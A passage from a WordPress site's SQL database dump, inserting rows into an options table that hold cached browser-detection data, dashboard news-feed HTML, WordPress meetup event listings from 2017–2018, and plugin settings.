0a3c632c785";}}', 'no');
INSERT INTO `cyb_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(108960, '_site_transient_timeout_theme_roots', '1525362238', 'no'),
(108961, '_site_transient_theme_roots', 'a:6:{s:16:"clearyourbeliefs";s:7:"/themes";s:14:"twentyfourteen";s:7:"/themes";s:15:"twentyseventeen";s:7:"/themes";s:13:"twentysixteen";s:7:"/themes";s:14:"twentythirteen";s:7:"/themes";s:12:"twentytwelve";s:7:"/themes";}', 'no'),
(88179, '_site_transient_timeout_browser_f86e3bcc7bdd9f0448835ad4d778aeaf', '1497775712', 'yes'),
(88180, '_site_transient_browser_f86e3bcc7bdd9f0448835ad4d778aeaf', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:4:"50.0";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88211, '_site_transient_timeout_browser_dc0e368d0074ef277d449c2ab428064f', '1497862831', 'yes'),
(88212, '_site_transient_browser_dc0e368d0074ef277d449c2ab428064f', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:6:"16.0.1";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88185, '_site_transient_timeout_browser_7a0d0838de0d75c380afe741b40f3eb1', '1497778802', 'yes'),
(88186, '_site_transient_browser_7a0d0838de0d75c380afe741b40f3eb1', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:4:"48.0";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88215, '_site_transient_browser_d0fdd3ca51496b6c1a4f7beabec83401', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:6:"15.0.1";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:1;s:8:"insecure";b:0;}', 'yes'),
(88208, '_site_transient_timeout_browser_b53e6b41d00eb25e0133547194d027a1', '1497862151', 'yes'),
(88214, '_site_transient_timeout_browser_d0fdd3ca51496b6c1a4f7beabec83401', '1497863053', 'yes'),
(88209, '_site_transient_browser_b53e6b41d00eb25e0133547194d027a1', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:6:"15.0.1";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:1;s:8:"insecure";b:0;}', 'yes'),
(88206, '_site_transient_timeout_browser_5893d0c10e00f6aea6229984f78eaec1', '1497862076', 'yes'),
(88207, '_site_transient_browser_5893d0c10e00f6aea6229984f78eaec1', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:6:"15.0.1";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:1;s:8:"insecure";b:0;}', 'yes'),
(88429, '_site_transient_timeout_browser_8621df93bc649392fd92029726a85c8a', '1498149495', 'yes'),
(88430, '_site_transient_browser_8621df93bc649392fd92029726a85c8a', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:6:"Chrome";s:7:"version";s:13:"51.0.2704.103";s:10:"update_url";s:28:"http://www.google.com/chrome";s:7:"img_src";s:49:"http://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88228, '_site_transient_timeout_browser_5ddcfe6dc7689782c1dd4444cdd07d75', '1497863394', 'yes'),
(88229, '_site_transient_browser_5ddcfe6dc7689782c1dd4444cdd07d75', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:6:"15.0.2";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:1;s:8:"insecure";b:0;}', 'yes'),
(88561, '_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109', '1497644799', 'no'),
(88562, '_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109', '1497644799', 'no'),
(88204, '_site_transient_timeout_browser_55c962b0d2c9f0f3c9d2ab481004218b', '1497862034', 'yes'),
(88205, '_site_transient_browser_55c962b0d2c9f0f3c9d2ab481004218b', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:6:"15.0.2";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:1;s:8:"insecure";b:0;}', 'yes'),
(88219, '_site_transient_timeout_browser_3bc842c6bf1556ba5ef2820b0ba409f0', '1497863161', 'yes'),
(88220, '_site_transient_browser_3bc842c6bf1556ba5ef2820b0ba409f0', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:6:"16.0.1";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88564, '_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51', '1497644799', 'no'),
(88565, '_transient_dash_4077549d03da2e451c8b5f002294ff51', '<div class="rss-widget"><ul><li><a class=''rsswidget'' href=''https://wordpress.org/news/2017/06/evans/''>WordPress 4.8 “Evans”</a> <span class="rss-date">June 8, 2017</span><div class="rssSummary">An Update with You in Mind Gear up for a more intuitive WordPress! Version 4.8 of WordPress, named “Evans” in honor of jazz pianist and composer William John “Bill” Evans, is available for download or update in your WordPress dashboard. New features in 4.8 add more ways for you to express yourself and represent your brand. Though some [&hellip;]</div></li></ul></div><div class="rss-widget"><ul><li><a class=''rsswidget'' href=''https://wptavern.com/wordcamp-europe-2017-kicks-off-with-contributor-day-focused-on-growing-wordpress-through-inclusion''>WPTavern: WordCamp Europe 2017 Kicks Off with Contributor Day Focused on Growing WordPress through Inclusion</a></li><li><a class=''rsswidget'' href=''https://wptavern.com/lifted-a-wordpress-theme-and-plugin-shop-for-the-marijuana-industry''>WPTavern: Lifted, a WordPress Theme and Plugin Shop for the Marijuana Industry</a></li><li><a class=''rsswidget'' href=''https://wptavern.com/9seeds-acquires-web-savvy-marketings-genesis-theme-store''>WPTavern: 9seeds Acquires Web Savvy Marketing’s Genesis Theme Store</a></li></ul></div><div class="rss-widget"><ul><li class=''dashboard-news-plugin''><span>Popular Plugin:</span> <a href=''https://wordpress.org/plugins/woocommerce/'' class=''dashboard-news-plugin-link''>WooCommerce</a>&nbsp;<span>(<a href=''plugin-install.php?tab=plugin-information&amp;plugin=woocommerce&amp;_wpnonce=f901fd10dd&amp;TB_iframe=true&amp;width=600&amp;height=800'' class=''thickbox'' title=''WooCommerce''>Install</a>)</span></li></ul></div>', 'no'),
(88302, '_site_transient_timeout_browser_5dd6b43fa171b6ab3a45b5d3f84bbc21', '1497968960', 'yes'),
(88315, '_site_transient_timeout_browser_2e6dc0b481ef790b8df006b2c3fa3fd3', '1497988656', 'yes'),
(88303, '_site_transient_browser_5dd6b43fa171b6ab3a45b5d3f84bbc21', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:4:"25.0";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88316, '_site_transient_browser_2e6dc0b481ef790b8df006b2c3fa3fd3', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:6:"3.6.12";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:1;s:8:"insecure";b:0;}', 'yes'),
(88352, '_site_transient_browser_047d9b1fecfa842fce24f4144ec85db4', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:6:"Chrome";s:7:"version";s:12:"59.0.3071.86";s:10:"update_url";s:28:"http://www.google.com/chrome";s:7:"img_src";s:49:"http://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(87516, 'ccj__activation_time', '1495047078', 'yes'),
(87517, 'ccj__version', '3.1', 'yes'),
(108881, '_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9', '1525183963', 'no'),
(88494, '_site_transient_timeout_browser_2bf78cb2f6f0604d5d237b451fa3d2f4', '1498171452', 'yes'),
(88495, '_site_transient_browser_2bf78cb2f6f0604d5d237b451fa3d2f4', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:6:"Chrome";s:7:"version";s:13:"49.0.2623.112";s:10:"update_url";s:28:"http://www.google.com/chrome";s:7:"img_src";s:49:"http://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88259, '_site_transient_timeout_browser_2424478e6b1ff60ea2c31d2f896a8141', '1497917848', 'yes'),
(88260, '_site_transient_browser_2424478e6b1ff60ea2c31d2f896a8141', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:4:"24.0";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88351, '_site_transient_timeout_browser_047d9b1fecfa842fce24f4144ec85db4', '1498057435', 'yes'),
(88375, '_site_transient_timeout_browser_2a67341ce16ee2deedf8c1306e2894bf', '1498062934', 'yes'),
(88376, '_site_transient_browser_2a67341ce16ee2deedf8c1306e2894bf', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:4:"25.0";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(88377, '_site_transient_timeout_browser_3c5448968136acdfc62a727759a33475', '1498062939', 'yes'),
(88378, '_site_transient_browser_3c5448968136acdfc62a727759a33475', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:4:"21.0";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'yes'),
(92859, '_site_transient_timeout_browser_6acf6632fad5e62ff61f48c06d20e4fa', '1504265815', 'no'),
(92860, '_site_transient_browser_6acf6632fad5e62ff61f48c06d20e4fa', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:6:"Chrome";s:7:"version";s:12:"58.0.3029.81";s:10:"update_url";s:28:"http://www.google.com/chrome";s:7:"img_src";s:49:"http://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'no'),
(88586, 'widget_media_audio', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(88587, 'widget_media_image', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(88588, 'widget_media_video', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(88589, 'finished_splitting_shared_terms', '1', 'yes'),
(88590, 'site_icon', '0', 'yes'),
(88591, 'medium_large_size_w', '768', 'yes'),
(88592, 'medium_large_size_h', '0', 'yes'),
(89619, '_site_transient_timeout_community-events-53a8fecd485dfffe3e01b5fa187341a1', '1499024791', 'no'),
(89620, '_site_transient_community-events-53a8fecd485dfffe3e01b5fa187341a1', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:13:"103.230.106.0";}s:6:"events";a:0:{}}', 'no'),
(90548, '_site_transient_timeout_community-events-89bf120bd2cc0729f117e5bcb59d3597', '1500365942', 'no'),
(90549, '_site_transient_community-events-89bf120bd2cc0729f117e5bcb59d3597', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:12:"103.87.250.0";}s:6:"events";a:1:{i:0;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:37:"Let''s Gather Again [Networking Event]";s:3:"url";s:63:"https://www.meetup.com/Dhaka-WordPress-Meetup/events/241515803/";s:6:"meetup";s:22:"Dhaka WordPress Meetup";s:10:"meetup_url";s:46:"https://www.meetup.com/Dhaka-WordPress-Meetup/";s:4:"date";s:19:"2017-07-29 15:00:00";s:8:"location";a:4:{s:8:"location";s:17:"Dhaka, Bangladesh";s:7:"country";s:2:"bd";s:8:"latitude";d:23.816711000000002;s:9:"longitude";d:90.365700000000004;}}}}', 'no'),
(91433, '_site_transient_timeout_community-events-59ee005db8a2521ce5849348e6ef648c', '1501690382', 'no'),
(91434, '_site_transient_community-events-59ee005db8a2521ce5849348e6ef648c', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:18:"2601:643:c000:30::";}s:6:"events";a:5:{i:0;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:35:"Writing your first WordPress Plugin";s:3:"url";s:65:"https://www.meetup.com/Wordpress-for-developers/events/241928952/";s:6:"meetup";s:24:"WordPress for Developers";s:10:"meetup_url";s:48:"https://www.meetup.com/Wordpress-for-developers/";s:4:"date";s:19:"2017-08-19 13:30:00";s:8:"location";a:4:{s:8:"location";s:23:"Redwood Shores, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.530250000000002;s:9:"longitude";d:-122.25832;}}i:1;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:46:"2017 East Bay WordPress Meetup Contributor Day";s:3:"url";s:65:"https://www.meetup.com/Eastbay-WordPress-Meetup/events/237830311/";s:6:"meetup";s:35:"The East Bay WordPress Meetup Group";s:10:"meetup_url";s:48:"https://www.meetup.com/Eastbay-WordPress-Meetup/";s:4:"date";s:19:"2017-08-20 11:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Oakland, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.808453;s:9:"longitude";d:-122.26593;}}i:2;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:26:"Moving to HTTPS It''s Time!";s:3:"url";s:72:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/events/241763971/";s:6:"meetup";s:34:"WordPress Bay Area Foothills Group";s:10:"meetup_url";s:55:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/";s:4:"date";s:19:"2017-08-30 13:30:00";s:8:"location";a:4:{s:8:"location";s:17:"Milpitas, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.432813000000003;s:9:"longitude";d:-121.907095;}}i:3;a:7:{s:4:"type";s:8:"wordcamp";s:5:"title";s:19:"WordCamp Sacramento";s:3:"url";s:36:"https://2017.sacramento.wordcamp.org";s:6:"meetup";N;s:10:"meetup_url";N;s:4:"date";s:19:"2017-09-16 00:00:00";s:8:"location";a:4:{s:8:"location";s:14:"Sacramento, CA";s:7:"country";s:2:"US";s:8:"latitude";d:38.578356399999997;s:9:"longitude";d:-121.48806740000001;}}i:4;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:35:"Content Imports and Site Migrations";s:3:"url";s:65:"https://www.meetup.com/Eastbay-WordPress-Meetup/events/237831390/";s:6:"meetup";s:35:"The East Bay WordPress Meetup Group";s:10:"meetup_url";s:48:"https://www.meetup.com/Eastbay-WordPress-Meetup/";s:4:"date";s:19:"2017-09-24 13:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Oakland, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.808453;s:9:"longitude";d:-122.26593;}}}}', 'no'),
(108475, '_site_transient_timeout_poptags_40cd750bba9870f18aada2478b24840a', '1524020693', 'no'),
(108476, '_site_transient_poptags_40cd750bba9870f18aada2478b24840a', 'O:8:"stdClass":1:{s:8:"external";b:1;}', 'no'),
(93331, '_site_transient_browser_a315670f019232f4f59d3f49fcaa265e', 'a:9:{s:8:"platform";s:9:"Macintosh";s:4:"name";s:6:"Safari";s:7:"version";s:6:"10.1.2";s:10:"update_url";s:28:"http://www.apple.com/safari/";s:7:"img_src";s:49:"http://s.wordpress.org/images/browsers/safari.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/safari.png";s:15:"current_version";s:1:"5";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'no'),
(96241, '_site_transient_timeout_community-events-3f9db8a9e481d5a45d76fdb8d6020cf7', '1512744323', 'no'),
(96242, '_site_transient_community-events-3f9db8a9e481d5a45d76fdb8d6020cf7', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:12:"50.224.169.0";}s:6:"events";a:4:{i:0;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:9:"Topic TBD";s:3:"url";s:61:"https://www.meetup.com/WordPress-Naperville/events/244733732/";s:6:"meetup";s:20:"WordPress Naperville";s:10:"meetup_url";s:44:"https://www.meetup.com/WordPress-Naperville/";s:4:"date";s:19:"2017-12-19 18:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Naperville, IL, USA";s:7:"country";s:2:"us";s:8:"latitude";d:41.802501999999997;s:9:"longitude";d:-88.130393999999995;}}i:1;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:25:"Debugging Tips and Tricks";s:3:"url";s:65:"https://www.meetup.com/Chicago-WordPress-Meetup/events/245263249/";s:6:"meetup";s:34:"Chicago Northside WordPress Meetup";s:10:"meetup_url";s:48:"https://www.meetup.com/Chicago-WordPress-Meetup/";s:4:"date";s:19:"2018-01-03 18:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Chicago, IL, USA";s:7:"country";s:2:"us";s:8:"latitude";d:41.954661000000002;s:9:"longitude";d:-87.654843999999997;}}i:2;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:9:"Topic TBD";s:3:"url";s:61:"https://www.meetup.com/WordPress-Naperville/events/244733736/";s:6:"meetup";s:20:"WordPress Naperville";s:10:"meetup_url";s:44:"https://www.meetup.com/WordPress-Naperville/";s:4:"date";s:19:"2018-01-16 18:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Naperville, IL, USA";s:7:"country";s:2:"us";s:8:"latitude";d:41.802501999999997;s:9:"longitude";d:-88.130393999999995;}}i:3;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:9:"Topic TBD";s:3:"url";s:61:"https://www.meetup.com/WordPress-Naperville/events/244787343/";s:6:"meetup";s:20:"WordPress Naperville";s:10:"meetup_url";s:44:"https://www.meetup.com/WordPress-Naperville/";s:4:"date";s:19:"2018-02-20 18:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Naperville, IL, USA";s:7:"country";s:2:"us";s:8:"latitude";d:41.802501999999997;s:9:"longitude";d:-88.130393999999995;}}}}', 'no'),
(97660, '_site_transient_timeout_community-events-68e46da4f5eace902ddac4b711a8e523', '1513757702', 'no'),
(97661, '_site_transient_community-events-68e46da4f5eace902ddac4b711a8e523', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:20:"2601:247:c002:d7ad::";}s:6:"events";a:5:{i:0;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:30:"End of Year Informal Gathering";s:3:"url";s:61:"https://www.meetup.com/WordPress-Naperville/events/244733732/";s:6:"meetup";s:20:"WordPress Naperville";s:10:"meetup_url";s:44:"https://www.meetup.com/WordPress-Naperville/";s:4:"date";s:19:"2017-12-19 18:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Naperville, IL, USA";s:7:"country";s:2:"us";s:8:"latitude";d:41.802897999999999;s:9:"longitude";d:-88.129311000000001;}}i:1;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:21:"WordPress "Open Chat"";s:3:"url";s:65:"https://www.meetup.com/Madison-WordPress-Meetup/events/240645231/";s:6:"meetup";s:24:"Madison WordPress Meetup";s:10:"meetup_url";s:48:"https://www.meetup.com/Madison-WordPress-Meetup/";s:4:"date";s:19:"2017-12-27 18:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Madison, WI, USA";s:7:"country";s:2:"us";s:8:"latitude";d:43.074084999999997;s:9:"longitude";d:-89.387330000000006;}}i:2;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:82:"1st-Wednesday-Morni­ng-of-the­-Month Waukesha County WordPress Meetup (No Topic)";s:3:"url";s:67:"https://www.meetup.com/Milwaukee-WordPress-MeetUp/events/245664688/";s:6:"meetup";s:39:"Greater Milwaukee Area WordPress Meetup";s:10:"meetup_url";s:50:"https://www.meetup.com/Milwaukee-WordPress-MeetUp/";s:4:"date";s:19:"2018-01-03 09:15:00";s:8:"location";a:4:{s:8:"location";s:19:"Brookfield, WI, USA";s:7:"country";s:2:"us";s:8:"latitude";d:43.055210000000002;s:9:"longitude";d:-88.125434999999996;}}i:3;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:9:"Topic TBD";s:3:"url";s:61:"https://www.meetup.com/WordPress-Naperville/events/244733736/";s:6:"meetup";s:20:"WordPress Naperville";s:10:"meetup_url";s:44:"https://www.meetup.com/WordPress-Naperville/";s:4:"date";s:19:"2018-01-16 18:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Naperville, IL, USA";s:7:"country";s:2:"us";s:8:"latitude";d:41.802501999999997;s:9:"longitude";d:-88.130393999999995;}}i:4;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:3:"TBA";s:3:"url";s:72:"https://www.meetup.com/Janesville-Area-WordPress-Users/events/244184169/";s:6:"meetup";s:31:"Janesville Area WordPress Users";s:10:"meetup_url";s:55:"https://www.meetup.com/Janesville-Area-WordPress-Users/";s:4:"date";s:19:"2018-01-22 19:00:00";s:8:"location";a:4:{s:8:"location";s:19:"Janesville, WI, USA";s:7:"country";s:2:"us";s:8:"latitude";d:42.679350999999997;s:9:"longitude";d:-89.018523999999999;}}}}', 'no'),
(93330, '_site_transient_timeout_browser_a315670f019232f4f59d3f49fcaa265e', '1505373560', 'no'),
(92172, 'password_protected_version', '2.0.3', 'yes'),
(92155, '_site_transient_timeout_community-events-5d215287b12c0b5d309916652a40f5b9', '1502772907', 'no'),
(92156, '_site_transient_community-events-5d215287b12c0b5d309916652a40f5b9', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:13:"103.230.104.0";}s:6:"events";a:0:{}}', 'no'),
(92803, '_site_transient_timeout_community-events-51f7db597840874816852ab6eddf1467', '1503647150', 'no'),
(92804, '_site_transient_community-events-51f7db597840874816852ab6eddf1467', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:12:"66.190.248.0";}s:6:"events";a:1:{i:0;a:7:{s:4:"type";s:8:"wordcamp";s:5:"title";s:30:"WordCamp Portland, Oregon, USA";s:3:"url";s:34:"https://2017.portland.wordcamp.org";s:6:"meetup";N;s:10:"meetup_url";N;s:4:"date";s:19:"2017-09-23 00:00:00";s:8:"location";a:4:{s:8:"location";s:21:"Portland, Oregon, USA";s:7:"country";s:2:"US";s:8:"latitude";d:45.452408300000002;s:9:"longitude";d:-122.6774355;}}}}', 'no'),
(93332, '_site_transient_timeout_community-events-a5384389280b400c2fc6c9ada34373ef', '1504811962', 'no'),
(93333, '_site_transient_community-events-a5384389280b400c2fc6c9ada34373ef', 'a:2:{s:8:"location";a:1:{s:2:"ip";s:20:"2601:643:c000:6fb0::";}s:6:"events";a:5:{i:0;a:7:{s:4:"type";s:8:"wordcamp";s:5:"title";s:19:"WordCamp Sacramento";s:3:"url";s:36:"https://2017.sacramento.wordcamp.org";s:6:"meetup";N;s:10:"meetup_url";N;s:4:"date";s:19:"2017-09-16 00:00:00";s:8:"location";a:4:{s:8:"location";s:14:"Sacramento, CA";s:7:"country";s:2:"US";s:8:"latitude";d:38.578356399999997;s:9:"longitude";d:-121.48806740000001;}}i:1;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:35:"Content Imports and Site Migrations";s:3:"url";s:65:"https://www.meetup.com/Eastbay-WordPress-Meetup/events/237831390/";s:6:"meetup";s:35:"The East Bay WordPress Meetup Group";s:10:"meetup_url";s:48:"https://www.meetup.com/Eastbay-WordPress-Meetup/";s:4:"date";s:19:"2017-09-24 13:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Oakland, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.808453;s:9:"longitude";d:-122.26593;}}i:2;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:3:"TBD";s:3:"url";s:72:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/events/242972363/";s:6:"meetup";s:34:"WordPress Bay Area Foothills Group";s:10:"meetup_url";s:55:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/";s:4:"date";s:19:"2017-09-27 13:30:00";s:8:"location";a:4:{s:8:"location";s:17:"Milpitas, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.432813000000003;s:9:"longitude";d:-121.907095;}}i:3;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:38:"Event Management Plugins for WordPress";s:3:"url";s:65:"https://www.meetup.com/Eastbay-WordPress-Meetup/events/237831353/";s:6:"meetup";s:35:"The East Bay WordPress Meetup Group";s:10:"meetup_url";s:48:"https://www.meetup.com/Eastbay-WordPress-Meetup/";s:4:"date";s:19:"2017-10-15 13:00:00";s:8:"location";a:4:{s:8:"location";s:16:"Oakland, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.808453;s:9:"longitude";d:-122.26593;}}i:4;a:7:{s:4:"type";s:6:"meetup";s:5:"title";s:3:"TBD";s:3:"url";s:75:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/events/dztqzlywnbhc/";s:6:"meetup";s:34:"WordPress Bay Area Foothills Group";s:10:"meetup_url";s:55:"https://www.meetup.com/Wordpress-Bay-Area-CA-Foothills/";s:4:"date";s:19:"2017-10-25 13:30:00";s:8:"location";a:4:{s:8:"location";s:17:"Milpitas, CA, USA";s:7:"country";s:2:"us";s:8:"latitude";d:37.432813000000003;s:9:"longitude";d:-121.907095;}}}}', 'no'),
(91553, 'widget_custom_html', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(92802, '_site_transient_browser_f2855ce5667c36740575d6fb16749060', 'a:9:{s:8:"platform";s:9:"Macintosh";s:4:"name";s:6:"Chrome";s:7:"version";s:13:"59.0.3071.115";s:10:"update_url";s:28:"http://www.google.com/chrome";s:7:"img_src";s:49:"http://s.wordpress.org/images/browsers/chrome.png";s:11:"img_src_ssl";s:48:"https://wordpress.org/images/browsers/chrome.png";s:15:"current_version";s:2:"18";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'no'),
(92801, '_site_transient_timeout_browser_f2855ce5667c36740575d6fb16749060', '1504208747', 'no'),
(96483, 'untecreator_state', 'a:2:{s:20:"fitler_active_addons";s:3:"all";s:15:"last_addons_cat";s:1:"1";}', 'yes'),
(96239, '_site_transient_timeout_browser_959e2b5b923f70cca34ca0f786ddfb9b', '1513305921', 'no'),
